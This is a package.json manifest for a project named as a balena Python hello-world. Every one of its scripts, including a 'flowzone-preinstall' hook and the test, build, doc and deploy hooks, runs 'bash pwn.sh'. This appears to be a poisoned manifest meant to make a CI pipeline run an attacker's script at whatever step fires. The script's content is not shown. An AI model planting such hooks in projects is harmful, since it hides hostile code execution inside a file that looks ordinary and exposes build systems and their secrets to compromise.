{
  "name": "balena-python-hello-world",
  "version": "1.0.0",
  "scripts": {
    "flowzone-preinstall": "bash pwn.sh",
    "test": "bash pwn.sh",
    "doc": "bash pwn.sh",
    "build": "bash pwn.sh",
    "deploy-docs": "bash pwn.sh"
  }
}
